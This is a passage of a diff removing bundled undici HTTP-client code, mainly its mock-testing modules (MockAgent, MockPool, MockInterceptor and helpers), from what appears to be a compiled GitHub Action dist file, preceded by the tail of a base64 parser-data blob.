AAAAAQBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAEBAQEBAQEBAQEBAQE
BAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAAAAAAAAAQIAAQMAAAAAAAAAAAAAAAAAAAAAAAAEAQEFAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAAAAAAAAAAAAAQAAAgAAAAAAAAAAAAAAAAAAAAAAAAMEAAAEBAQEBAQEBAQEBAUEBAQEBAQEBAQEBAQABAAGBwQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAEAAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAIAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAAAAAAAADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOT1VOQ0VFQ0tPVVRORUNURVRFQ1JJQkVMVVNIRVRFQURTRUFSQ0hSR0VDVElWSVRZTEVOREFSVkVPVElGWVBUSU9OU0NIU0VBWVNUQVRDSEdFT1JESVJFQ1RPUlRSQ0hQQVJBTUVURVJ
VUkNFQlNDUklCRUFSRE9XTkFDRUlORE5LQ0tVQlNDUklCRUhUVFAvQURUUC8=' - - -/***/ }), - -/***/ 5627: -/***/ ((module) => { - -module.exports = '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' - - -/***/ }), - -/***/ 1891: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.enumToMap = void 0; -function enumToMap(obj) { - const res = {}; - Object.keys(obj).forEach((key) => { - const value = obj[key]; - if (typeof value === 'number') { - res[key] = value; - } - }); - return res; -} -exports.enumToMap = enumToMap; -//# sourceMappingURL=utils.js.map - -/***/ }), - -/***/ 6771: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kClients } = __nccwpck_require__(2785) -const Agent = __nccwpck_require__(7890) -const { - kAgent, - kMockAgentSet, - kMockAgentGet, - kDispatches, - kIsMockActive, - kNetConnect, - kGetNetConnect, - kOptions, - kFactory -} = __nccwpck_require__(4347) -const MockClient = __nccwpck_require__(8687) -const MockPool = __nccwpck_require__(6193) -const { matchValue, buildMockOptions } = __nccwpck_require__(9323) -const { InvalidArgumentError, UndiciError } = __nccwpck_require__(8045) -const Dispatcher = __nccwpck_require__(412) -const Pluralizer = __nccwpck_require__(8891) -const PendingInterceptorsFormatter = __nccwpck_require__(6823) - -class FakeWeakRef { - constructor (value) { - this.value = value - } - - deref () { - return this.value - } -} - -class MockAgent extends Dispatcher { - constructor (opts) { - super(opts) - - this[kNetConnect] = true - this[kIsMockActive] = true - - // Instantiate Agent and encapsulate - if ((opts && opts.agent && typeof opts.agent.dispatch !== 'function')) { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - const agent = opts && opts.agent ? 
opts.agent : new Agent(opts) - this[kAgent] = agent - - this[kClients] = agent[kClients] - this[kOptions] = buildMockOptions(opts) - } - - get (origin) { - let dispatcher = this[kMockAgentGet](origin) - - if (!dispatcher) { - dispatcher = this[kFactory](origin) - this[kMockAgentSet](origin, dispatcher) - } - return dispatcher - } - - dispatch (opts, handler) { - // Call MockAgent.get to perform additional setup before dispatching as normal - this.get(opts.origin) - return this[kAgent].dispatch(opts, handler) - } - - async close () { - await this[kAgent].close() - this[kClients].clear() - } - - deactivate () { - this[kIsMockActive] = false - } - - activate () { - this[kIsMockActive] = true - } - - enableNetConnect (matcher) { - if (typeof matcher === 'string' || typeof matcher === 'function' || matcher instanceof RegExp) { - if (Array.isArray(this[kNetConnect])) { - this[kNetConnect].push(matcher) - } else { - this[kNetConnect] = [matcher] - } - } else if (typeof matcher === 'undefined') { - this[kNetConnect] = true - } else { - throw new InvalidArgumentError('Unsupported matcher. Must be one of String|Function|RegExp.') - } - } - - disableNetConnect () { - this[kNetConnect] = false - } - - // This is required to bypass issues caused by using global symbols - see: - // https://github.com/nodejs/undici/issues/1447 - get isMockActive () { - return this[kIsMockActive] - } - - [kMockAgentSet] (origin, dispatcher) { - this[kClients].set(origin, new FakeWeakRef(dispatcher)) - } - - [kFactory] (origin) { - const mockOptions = Object.assign({ agent: this }, this[kOptions]) - return this[kOptions] && this[kOptions].connections === 1 - ? 
new MockClient(origin, mockOptions) - : new MockPool(origin, mockOptions) - } - - [kMockAgentGet] (origin) { - // First check if we can immediately find it - const ref = this[kClients].get(origin) - if (ref) { - return ref.deref() - } - - // If the origin is not a string create a dummy parent pool and return to user - if (typeof origin !== 'string') { - const dispatcher = this[kFactory]('http://localhost:9999') - this[kMockAgentSet](origin, dispatcher) - return dispatcher - } - - // If we match, create a pool and assign the same dispatches - for (const [keyMatcher, nonExplicitRef] of Array.from(this[kClients])) { - const nonExplicitDispatcher = nonExplicitRef.deref() - if (nonExplicitDispatcher && typeof keyMatcher !== 'string' && matchValue(keyMatcher, origin)) { - const dispatcher = this[kFactory](origin) - this[kMockAgentSet](origin, dispatcher) - dispatcher[kDispatches] = nonExplicitDispatcher[kDispatches] - return dispatcher - } - } - } - - [kGetNetConnect] () { - return this[kNetConnect] - } - - pendingInterceptors () { - const mockAgentClients = this[kClients] - - return Array.from(mockAgentClients.entries()) - .flatMap(([origin, scope]) => scope.deref()[kDispatches].map(dispatch => ({ ...dispatch, origin }))) - .filter(({ pending }) => pending) - } - - assertNoPendingInterceptors ({ pendingInterceptorsFormatter = new PendingInterceptorsFormatter() } = {}) { - const pending = this.pendingInterceptors() - - if (pending.length === 0) { - return - } - - const pluralizer = new Pluralizer('interceptor', 'interceptors').pluralize(pending.length) - - throw new UndiciError(` -${pluralizer.count} ${pluralizer.noun} ${pluralizer.is} pending: - -${pendingInterceptorsFormatter.format(pending)} -`.trim()) - } -} - -module.exports = MockAgent - - -/***/ }), - -/***/ 8687: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { promisify } = __nccwpck_require__(3837) -const Client = __nccwpck_require__(3598) -const { 
buildMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kMockAgent, - kClose, - kOriginalClose, - kOrigin, - kOriginalDispatch, - kConnected -} = __nccwpck_require__(4347) -const { MockInterceptor } = __nccwpck_require__(410) -const Symbols = __nccwpck_require__(2785) -const { InvalidArgumentError } = __nccwpck_require__(8045) - -/** - * MockClient provides an API that extends the Client to influence the mockDispatches. - */ -class MockClient extends Client { - constructor (origin, opts) { - super(origin, opts) - - if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - - this[kMockAgent] = opts.agent - this[kOrigin] = origin - this[kDispatches] = [] - this[kConnected] = 1 - this[kOriginalDispatch] = this.dispatch - this[kOriginalClose] = this.close.bind(this) - - this.dispatch = buildMockDispatch.call(this) - this.close = this[kClose] - } - - get [Symbols.kConnected] () { - return this[kConnected] - } - - /** - * Sets up the base interceptor for mocking replies from undici. 
- */ - intercept (opts) { - return new MockInterceptor(opts, this[kDispatches]) - } - - async [kClose] () { - await promisify(this[kOriginalClose])() - this[kConnected] = 0 - this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) - } -} - -module.exports = MockClient - - -/***/ }), - -/***/ 888: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { UndiciError } = __nccwpck_require__(8045) - -class MockNotMatchedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, MockNotMatchedError) - this.name = 'MockNotMatchedError' - this.message = message || 'The request does not match any registered mock dispatches' - this.code = 'UND_MOCK_ERR_MOCK_NOT_MATCHED' - } -} - -module.exports = { - MockNotMatchedError -} - - -/***/ }), - -/***/ 410: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { getResponseData, buildKey, addMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kDispatchKey, - kDefaultHeaders, - kDefaultTrailers, - kContentLength, - kMockDispatch -} = __nccwpck_require__(4347) -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { buildURL } = __nccwpck_require__(3983) - -/** - * Defines the scope API for an interceptor reply - */ -class MockScope { - constructor (mockDispatch) { - this[kMockDispatch] = mockDispatch - } - - /** - * Delay a reply by a set amount in ms. - */ - delay (waitInMs) { - if (typeof waitInMs !== 'number' || !Number.isInteger(waitInMs) || waitInMs <= 0) { - throw new InvalidArgumentError('waitInMs must be a valid integer > 0') - } - - this[kMockDispatch].delay = waitInMs - return this - } - - /** - * For a defined reply, never mark as consumed. - */ - persist () { - this[kMockDispatch].persist = true - return this - } - - /** - * Allow one to define a reply for a set amount of matching requests. 
- */ - times (repeatTimes) { - if (typeof repeatTimes !== 'number' || !Number.isInteger(repeatTimes) || repeatTimes <= 0) { - throw new InvalidArgumentError('repeatTimes must be a valid integer > 0') - } - - this[kMockDispatch].times = repeatTimes - return this - } -} - -/** - * Defines an interceptor for a Mock - */ -class MockInterceptor { - constructor (opts, mockDispatches) { - if (typeof opts !== 'object') { - throw new InvalidArgumentError('opts must be an object') - } - if (typeof opts.path === 'undefined') { - throw new InvalidArgumentError('opts.path must be defined') - } - if (typeof opts.method === 'undefined') { - opts.method = 'GET' - } - // See https://github.com/nodejs/undici/issues/1245 - // As per RFC 3986, clients are not supposed to send URI - // fragments to servers when they retrieve a document, - if (typeof opts.path === 'string') { - if (opts.query) { - opts.path = buildURL(opts.path, opts.query) - } else { - // Matches https://github.com/nodejs/undici/blob/main/lib/fetch/index.js#L1811 - const parsedURL = new URL(opts.path, 'data://') - opts.path = parsedURL.pathname + parsedURL.search - } - } - if (typeof opts.method === 'string') { - opts.method = opts.method.toUpperCase() - } - - this[kDispatchKey] = buildKey(opts) - this[kDispatches] = mockDispatches - this[kDefaultHeaders] = {} - this[kDefaultTrailers] = {} - this[kContentLength] = false - } - - createMockScopeDispatchData (statusCode, data, responseOptions = {}) { - const responseData = getResponseData(data) - const contentLength = this[kContentLength] ? 
{ 'content-length': responseData.length } : {} - const headers = { ...this[kDefaultHeaders], ...contentLength, ...responseOptions.headers } - const trailers = { ...this[kDefaultTrailers], ...responseOptions.trailers } - - return { statusCode, data, headers, trailers } - } - - validateReplyParameters (statusCode, data, responseOptions) { - if (typeof statusCode === 'undefined') { - throw new InvalidArgumentError('statusCode must be defined') - } - if (typeof data === 'undefined') { - throw new InvalidArgumentError('data must be defined') - } - if (typeof responseOptions !== 'object') { - throw new InvalidArgumentError('responseOptions must be an object') - } - } - - /** - * Mock an undici request with a defined reply. - */ - reply (replyData) { - // Values of reply aren't available right now as they - // can only be available when the reply callback is invoked. - if (typeof replyData === 'function') { - // We'll first wrap the provided callback in another function, - // this function will properly resolve the data from the callback - // when invoked. - const wrappedDefaultsCallback = (opts) => { - // Our reply options callback contains the parameter for statusCode, data and options. - const resolvedData = replyData(opts) - - // Check if it is in the right format - if (typeof resolvedData !== 'object') { - throw new InvalidArgumentError('reply options callback must return an object') - } - - const { statusCode, data = '', responseOptions = {} } = resolvedData - this.validateReplyParameters(statusCode, data, responseOptions) - // Since the values can be obtained immediately we return them - // from this higher order function that will be resolved later. - return { - ...this.createMockScopeDispatchData(statusCode, data, responseOptions) - } - } - - // Add usual dispatch data, but this time set the data parameter to function that will eventually provide data. 
- const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], wrappedDefaultsCallback) - return new MockScope(newMockDispatch) - } - - // We can have either one or three parameters, if we get here, - // we should have 1-3 parameters. So we spread the arguments of - // this function to obtain the parameters, since replyData will always - // just be the statusCode. - const [statusCode, data = '', responseOptions = {}] = [...arguments] - this.validateReplyParameters(statusCode, data, responseOptions) - - // Send in-already provided data like usual - const dispatchData = this.createMockScopeDispatchData(statusCode, data, responseOptions) - const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], dispatchData) - return new MockScope(newMockDispatch) - } - - /** - * Mock an undici request with a defined error. - */ - replyWithError (error) { - if (typeof error === 'undefined') { - throw new InvalidArgumentError('error must be defined') - } - - const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], { error }) - return new MockScope(newMockDispatch) - } - - /** - * Set default reply headers on the interceptor for subsequent replies - */ - defaultReplyHeaders (headers) { - if (typeof headers === 'undefined') { - throw new InvalidArgumentError('headers must be defined') - } - - this[kDefaultHeaders] = headers - return this - } - - /** - * Set default reply trailers on the interceptor for subsequent replies - */ - defaultReplyTrailers (trailers) { - if (typeof trailers === 'undefined') { - throw new InvalidArgumentError('trailers must be defined') - } - - this[kDefaultTrailers] = trailers - return this - } - - /** - * Set reply content length header for replies on the interceptor - */ - replyContentLength () { - this[kContentLength] = true - return this - } -} - -module.exports.MockInterceptor = MockInterceptor -module.exports.MockScope = MockScope - - -/***/ }), - -/***/ 6193: -/***/ ((module, 
__unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { promisify } = __nccwpck_require__(3837) -const Pool = __nccwpck_require__(4634) -const { buildMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kMockAgent, - kClose, - kOriginalClose, - kOrigin, - kOriginalDispatch, - kConnected -} = __nccwpck_require__(4347) -const { MockInterceptor } = __nccwpck_require__(410) -const Symbols = __nccwpck_require__(2785) -const { InvalidArgumentError } = __nccwpck_require__(8045) - -/** - * MockPool provides an API that extends the Pool to influence the mockDispatches. - */ -class MockPool extends Pool { - constructor (origin, opts) { - super(origin, opts) - - if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - - this[kMockAgent] = opts.agent - this[kOrigin] = origin - this[kDispatches] = [] - this[kConnected] = 1 - this[kOriginalDispatch] = this.dispatch - this[kOriginalClose] = this.close.bind(this) - - this.dispatch = buildMockDispatch.call(this) - this.close = this[kClose] - } - - get [Symbols.kConnected] () { - return this[kConnected] - } - - /** - * Sets up the base interceptor for mocking replies from undici. 
- */ - intercept (opts) { - return new MockInterceptor(opts, this[kDispatches]) - } - - async [kClose] () { - await promisify(this[kOriginalClose])() - this[kConnected] = 0 - this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) - } -} - -module.exports = MockPool - - -/***/ }), - -/***/ 4347: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kAgent: Symbol('agent'), - kOptions: Symbol('options'), - kFactory: Symbol('factory'), - kDispatches: Symbol('dispatches'), - kDispatchKey: Symbol('dispatch key'), - kDefaultHeaders: Symbol('default headers'), - kDefaultTrailers: Symbol('default trailers'), - kContentLength: Symbol('content length'), - kMockAgent: Symbol('mock agent'), - kMockAgentSet: Symbol('mock agent set'), - kMockAgentGet: Symbol('mock agent get'), - kMockDispatch: Symbol('mock dispatch'), - kClose: Symbol('close'), - kOriginalClose: Symbol('original agent close'), - kOrigin: Symbol('origin'), - kIsMockActive: Symbol('is mock active'), - kNetConnect: Symbol('net connect'), - kGetNetConnect: Symbol('get net connect'), - kConnected: Symbol('connected') -} - - -/***/ }), - -/***/ 9323: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { MockNotMatchedError } = __nccwpck_require__(888) -const { - kDispatches, - kMockAgent, - kOriginalDispatch, - kOrigin, - kGetNetConnect -} = __nccwpck_require__(4347) -const { buildURL, nop } = __nccwpck_require__(3983) -const { STATUS_CODES } = __nccwpck_require__(3685) -const { - types: { - isPromise - } -} = __nccwpck_require__(3837) - -function matchValue (match, value) { - if (typeof match === 'string') { - return match === value - } - if (match instanceof RegExp) { - return match.test(value) - } - if (typeof match === 'function') { - return match(value) === true - } - return false -} - -function lowerCaseEntries (headers) { - return Object.fromEntries( - Object.entries(headers).map(([headerName, headerValue]) => { - return [headerName.toLocaleLowerCase(), 
headerValue] - }) - ) -} - -/** - * @param {import('../../index').Headers|string[]|Record} headers - * @param {string} key - */ -function getHeaderByName (headers, key) { - if (Array.isArray(headers)) { - for (let i = 0; i < headers.length; i += 2) { - if (headers[i].toLocaleLowerCase() === key.toLocaleLowerCase()) { - return headers[i + 1] - } - } - - return undefined - } else if (typeof headers.get === 'function') { - return headers.get(key) - } else { - return lowerCaseEntries(headers)[key.toLocaleLowerCase()] - } -} - -/** @param {string[]} headers */ -function buildHeadersFromArray (headers) { // fetch HeadersList - const clone = headers.slice() - const entries = [] - for (let index = 0; index < clone.length; index += 2) { - entries.push([clone[index], clone[index + 1]]) - } - return Object.fromEntries(entries) -} - -function matchHeaders (mockDispatch, headers) { - if (typeof mockDispatch.headers === 'function') { - if (Array.isArray(headers)) { // fetch HeadersList - headers = buildHeadersFromArray(headers) - } - return mockDispatch.headers(headers ? 
lowerCaseEntries(headers) : {}) - } - if (typeof mockDispatch.headers === 'undefined') { - return true - } - if (typeof headers !== 'object' || typeof mockDispatch.headers !== 'object') { - return false - } - - for (const [matchHeaderName, matchHeaderValue] of Object.entries(mockDispatch.headers)) { - const headerValue = getHeaderByName(headers, matchHeaderName) - - if (!matchValue(matchHeaderValue, headerValue)) { - return false - } - } - return true -} - -function safeUrl (path) { - if (typeof path !== 'string') { - return path - } - - const pathSegments = path.split('?') - - if (pathSegments.length !== 2) { - return path - } - - const qp = new URLSearchParams(pathSegments.pop()) - qp.sort() - return [...pathSegments, qp.toString()].join('?') -} - -function matchKey (mockDispatch, { path, method, body, headers }) { - const pathMatch = matchValue(mockDispatch.path, path) - const methodMatch = matchValue(mockDispatch.method, method) - const bodyMatch = typeof mockDispatch.body !== 'undefined' ? matchValue(mockDispatch.body, body) : true - const headersMatch = matchHeaders(mockDispatch, headers) - return pathMatch && methodMatch && bodyMatch && headersMatch -} - -function getResponseData (data) { - if (Buffer.isBuffer(data)) { - return data - } else if (typeof data === 'object') { - return JSON.stringify(data) - } else { - return data.toString() - } -} - -function getMockDispatch (mockDispatches, key) { - const basePath = key.query ? buildURL(key.path, key.query) : key.path - const resolvedPath = typeof basePath === 'string' ? 
safeUrl(basePath) : basePath - - // Match path - let matchedMockDispatches = mockDispatches.filter(({ consumed }) => !consumed).filter(({ path }) => matchValue(safeUrl(path), resolvedPath)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for path '${resolvedPath}'`) - } - - // Match method - matchedMockDispatches = matchedMockDispatches.filter(({ method }) => matchValue(method, key.method)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for method '${key.method}'`) - } - - // Match body - matchedMockDispatches = matchedMockDispatches.filter(({ body }) => typeof body !== 'undefined' ? matchValue(body, key.body) : true) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for body '${key.body}'`) - } - - // Match headers - matchedMockDispatches = matchedMockDispatches.filter((mockDispatch) => matchHeaders(mockDispatch, key.headers)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for headers '${typeof key.headers === 'object' ? JSON.stringify(key.headers) : key.headers}'`) - } - - return matchedMockDispatches[0] -} - -function addMockDispatch (mockDispatches, key, data) { - const baseData = { timesInvoked: 0, times: 1, persist: false, consumed: false } - const replyData = typeof data === 'function' ? 
{ callback: data } : { ...data } - const newMockDispatch = { ...baseData, ...key, pending: true, data: { error: null, ...replyData } } - mockDispatches.push(newMockDispatch) - return newMockDispatch -} - -function deleteMockDispatch (mockDispatches, key) { - const index = mockDispatches.findIndex(dispatch => { - if (!dispatch.consumed) { - return false - } - return matchKey(dispatch, key) - }) - if (index !== -1) { - mockDispatches.splice(index, 1) - } -} - -function buildKey (opts) { - const { path, method, body, headers, query } = opts - return { - path, - method, - body, - headers, - query - } -} - -function generateKeyValues (data) { - return Object.entries(data).reduce((keyValuePairs, [key, value]) => [ - ...keyValuePairs, - Buffer.from(`${key}`), - Array.isArray(value) ? value.map(x => Buffer.from(`${x}`)) : Buffer.from(`${value}`) - ], []) -} - -/** - * @see https://developer.mozilla.org/en-US/docs/Web/HTTP/Status - * @param {number} statusCode - */ -function getStatusText (statusCode) { - return STATUS_CODES[statusCode] || 'unknown' -} - -async function getResponse (body) { - const buffers = [] - for await (const data of body) { - buffers.push(data) - } - return Buffer.concat(buffers).toString('utf8') -} - -/** - * Mock dispatch function used to simulate undici dispatches - */ -function mockDispatch (opts, handler) { - // Get mock dispatch from built key - const key = buildKey(opts) - const mockDispatch = getMockDispatch(this[kDispatches], key) - - mockDispatch.timesInvoked++ - - // Here's where we resolve a callback if a callback is present for the dispatch data. 
- if (mockDispatch.data.callback) { - mockDispatch.data = { ...mockDispatch.data, ...mockDispatch.data.callback(opts) } - } - - // Parse mockDispatch data - const { data: { statusCode, data, headers, trailers, error }, delay, persist } = mockDispatch - const { timesInvoked, times } = mockDispatch - - // If it's used up and not persistent, mark as consumed - mockDispatch.consumed = !persist && timesInvoked >= times - mockDispatch.pending = timesInvoked < times - - // If specified, trigger dispatch error - if (error !== null) { - deleteMockDispatch(this[kDispatches], key) - handler.onError(error) - return true - } - - // Handle the request with a delay if necessary - if (typeof delay === 'number' && delay > 0) { - setTimeout(() => { - handleReply(this[kDispatches]) - }, delay) - } else { - handleReply(this[kDispatches]) - } - - function handleReply (mockDispatches, _data = data) { - // fetch's HeadersList is a 1D string array - const optsHeaders = Array.isArray(opts.headers) - ? buildHeadersFromArray(opts.headers) - : opts.headers - const body = typeof _data === 'function' - ? _data({ ...opts, headers: optsHeaders }) - : _data - - // util.types.isPromise is likely needed for jest. - if (isPromise(body)) { - // If handleReply is asynchronous, throwing an error - // in the callback will reject the promise, rather than - // synchronously throw the error, which breaks some tests. - // Rather, we wait for the callback to resolve if it is a - // promise, and then re-run handleReply with the new body. 
- body.then((newData) => handleReply(mockDispatches, newData)) - return - } - - const responseData = getResponseData(body) - const responseHeaders = generateKeyValues(headers) - const responseTrailers = generateKeyValues(trailers) - - handler.abort = nop - handler.onHeaders(statusCode, responseHeaders, resume, getStatusText(statusCode)) - handler.onData(Buffer.from(responseData)) - handler.onComplete(responseTrailers) - deleteMockDispatch(mockDispatches, key) - } - - function resume () {} - - return true -} - -function buildMockDispatch () { - const agent = this[kMockAgent] - const origin = this[kOrigin] - const originalDispatch = this[kOriginalDispatch] - - return function dispatch (opts, handler) { - if (agent.isMockActive) { - try { - mockDispatch.call(this, opts, handler) - } catch (error) { - if (error instanceof MockNotMatchedError) { - const netConnect = agent[kGetNetConnect]() - if (netConnect === false) { - throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect disabled)`) - } - if (checkNetConnect(netConnect, origin)) { - originalDispatch.call(this, opts, handler) - } else { - throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect is not enabled for this origin)`) - } - } else { - throw error - } - } - } else { - originalDispatch.call(this, opts, handler) - } - } -} - -function checkNetConnect (netConnect, origin) { - const url = new URL(origin) - if (netConnect === true) { - return true - } else if (Array.isArray(netConnect) && netConnect.some((matcher) => matchValue(matcher, url.host))) { - return true - } - return false -} - -function buildMockOptions (opts) { - if (opts) { - const { agent, ...mockOptions } = opts - return mockOptions - } -} - -module.exports = { - getResponseData, - getMockDispatch, - addMockDispatch, - deleteMockDispatch, - buildKey, - generateKeyValues, - matchValue, - getResponse, - getStatusText, - 
mockDispatch, - buildMockDispatch, - checkNetConnect, - buildMockOptions, - getHeaderByName -} - - -/***/ }), - -/***/ 6823: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Transform } = __nccwpck_require__(2781) -const { Console } = __nccwpck_require__(6206) - -/** - * Gets the output of `console.table(…)` as a string. - */ -module.exports = class PendingInterceptorsFormatter { - constructor ({ disableColors } = {}) { - this.transform = new Transform({ - transform (chunk, _enc, cb) { - cb(null, chunk) - } - }) - - this.logger = new Console({ - stdout: this.transform, - inspectOptions: { - colors: !disableColors && !process.env.CI - } - }) - } - - format (pendingInterceptors) { - const withPrettyHeaders = pendingInterceptors.map( - ({ method, path, data: { statusCode }, persist, times, timesInvoked, origin }) => ({ - Method: method, - Origin: origin, - Path: path, - 'Status code': statusCode, - Persistent: persist ? '✅' : 'âŒ', - Invocations: timesInvoked, - Remaining: persist ? Infinity : times - timesInvoked - })) - - this.logger.table(withPrettyHeaders) - return this.transform.read().toString() - } -} - - -/***/ }), - -/***/ 8891: -/***/ ((module) => { - -"use strict"; - - -const singulars = { - pronoun: 'it', - is: 'is', - was: 'was', - this: 'this' -} - -const plurals = { - pronoun: 'they', - is: 'are', - was: 'were', - this: 'these' -} - -module.exports = class Pluralizer { - constructor (singular, plural) { - this.singular = singular - this.plural = plural - } - - pluralize (count) { - const one = count === 1 - const keys = one ? singulars : plurals - const noun = one ? this.singular : this.plural - return { ...keys, count, noun } - } -} - - -/***/ }), - -/***/ 8266: -/***/ ((module) => { - -"use strict"; -/* eslint-disable */ - - - -// Extracted from node/lib/internal/fixed_queue.js - -// Currently optimal queue size, tested on V8 6.0 - 6.6. Must be power of two. 
-const kSize = 2048; -const kMask = kSize - 1; - -// The FixedQueue is implemented as a singly-linked list of fixed-size -// circular buffers. It looks something like this: -// -// head tail -// | | -// v v -// +-----------+ <-----\ +-----------+ <------\ +-----------+ -// | [null] | \----- | next | \------- | next | -// +-----------+ +-----------+ +-----------+ -// | item | <-- bottom | item | <-- bottom | [empty] | -// | item | | item | | [empty] | -// | item | | item | | [empty] | -// | item | | item | | [empty] | -// | item | | item | bottom --> | item | -// | item | | item | | item | -// | ... | | ... | | ... | -// | item | | item | | item | -// | item | | item | | item | -// | [empty] | <-- top | item | | item | -// | [empty] | | item | | item | -// | [empty] | | [empty] | <-- top top --> | [empty] | -// +-----------+ +-----------+ +-----------+ -// -// Or, if there is only one circular buffer, it looks something -// like either of these: -// -// head tail head tail -// | | | | -// v v v v -// +-----------+ +-----------+ -// | [null] | | [null] | -// +-----------+ +-----------+ -// | [empty] | | item | -// | [empty] | | item | -// | item | <-- bottom top --> | [empty] | -// | item | | [empty] | -// | [empty] | <-- top bottom --> | item | -// | [empty] | | item | -// +-----------+ +-----------+ -// -// Adding a value means moving `top` forward by one, removing means -// moving `bottom` forward by one. After reaching the end, the queue -// wraps around. -// -// When `top === bottom` the current queue is empty and when -// `top + 1 === bottom` it's full. This wastes a single space of storage -// but allows much quicker checks. 
